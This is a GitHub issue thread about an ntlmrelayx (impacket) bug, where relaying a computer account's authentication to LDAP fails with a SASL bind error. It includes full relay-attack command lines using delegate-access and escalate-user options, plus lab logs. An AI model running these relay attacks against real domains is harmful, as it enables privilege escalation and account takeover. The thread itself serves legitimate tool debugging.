### ISSUE TITLE
ntlmrelayx : LDAP bind error with COMPUTER account

### ISSUE THREAD

**Issue by mpgn** [SecureAuthCorp/impacket#821]
When using an COMPUTER account to relay credentials, for example with the printerbug, there is an error with the LDAP bind.

Same problem as #686 but the initial problem is not correct since it's not related to remove-mic option

### Configuration  
impacket version:  
- Impacket v0.9.22.dev1+20200327.103853.7e505892 
- Impacket v0.9.21

Python version:  3.8
Target OS:  Kali

### Debug Output With Command String  

```
bonclay@kali:~/impacket$ sudo ntlmrelayx.py -t ldaps://192.168.255.131 --delegate-access -debug --remove-mic -smb2support
Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2020 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/local/lib/python3.8/dist-packages/impacket
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack MSSQL loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack SMB loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
[*] SMBD-Thread-3: Connection from GOLD/ZORO$@192.168.255.132 controlled, attacking target ldaps://192.168.255.131
[*] Authenticating against ldaps://192.168.255.131 as GOLD/ZORO$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] SMBD-Thread-3: Connection from GOLD/ZORO$@192.168.255.132 controlled, but there are no more targets left!
[+] User is a member of: []
Exception in thread Thread-4:
Traceback (most recent call last):
  File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner
    self.run()
  File "/usr/local/lib/python3.8/dist-packages/impacket/examples/ntlmrelayx/attacks/ldapattack.py", line 564, in run
    userSid, privs = self.validatePrivileges(self.username, domainDumper)
  File "/usr/local/lib/python3.8/dist-packages/impacket/examples/ntlmrelayx/attacks/ldapattack.py", line 386, in validatePrivileges
    self.client.search(domainDumper.root, '(objectClass=domain)', attributes=['objectSid'])
  File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 782, in search
    response = self.post_send_search(self.send('searchRequest', request, controls))
  File "/usr/lib/python3/dist-packages/ldap3/strategy/base.py", line 289, in send
    raise LDAPSASLBindInProgressError(self.connection.last_error)
ldap3.core.exceptions.LDAPSASLBindInProgressError: cannot send operation requests while SASL bind is in progress
^Cbonclay@kali:~/impacket$ sudo ntlmrelayx.py -t ldap://192.168.255.131 --escalate-user ntu -debug --remove-mic -smb2support
Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2020 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/local/lib/python3.8/dist-packages/impacket
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack MSSQL loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack SMB loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
[*] SMBD-Thread-3: Connection from GOLD/ZORO$@192.168.255.132 controlled, attacking target ldap://192.168.255.131
[*] Authenticating against ldap://192.168.255.131 as GOLD/ZORO$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] SMBD-Thread-3: Connection from GOLD/ZORO$@192.168.255.132 controlled, but there are no more targets left!
[+] User is a member of: []
Exception in thread Thread-4:
Traceback (most recent call last):
  File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner
    self.run()
  File "/usr/local/lib/python3.8/dist-packages/impacket/examples/ntlmrelayx/attacks/ldapattack.py", line 564, in run
    userSid, privs = self.validatePrivileges(self.username, domainDumper)
  File "/usr/local/lib/python3.8/dist-packages/impacket/examples/ntlmrelayx/attacks/ldapattack.py", line 386, in validatePrivileges
    self.client.search(domainDumper.root, '(objectClass=domain)', attributes=['objectSid'])
  File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 782, in search
    response = self.post_send_search(self.send('searchRequest', request, controls))
  File "/usr/lib/python3/dist-packages/ldap3/strategy/base.py", line 289, in send
    raise LDAPSASLBindInProgressError(self.connection.last_error)
ldap3.core.exceptions.LDAPSASLBindInProgressError: cannot send operation requests while SASL bind is in progress
^Cbonclay@kali:~/impacket$ 
```

### PCAP  

![image](https://user-images.githubusercontent.com/5891788/79199816-cd3e4c80-7e35-11ea-800e-0a93fee9f4c4.png)

A second authentification with user '' is also use in ntlmrelayx which cause the LDAP bind error

![image](https://user-images.githubusercontent.com/5891788/79199791-c6173e80-7e35-11ea-83f8-0a0ac5a07aba.png)

### Additional context  

With a user account, no bind error since only one bind is done

![image](https://user-images.githubusercontent.com/5891788/79200028-1ee6d700-7e36-11ea-8cf0-837f56139d2e.png)

**Comment by mpgn** [comment]
Fixed with the PR

**Comment by mpgn** [comment]
Problem fixed with the PR

![image](https://user-images.githubusercontent.com/5891788/80277213-cb09a700-86ed-11ea-85d3-3ede2d897cf5.png)
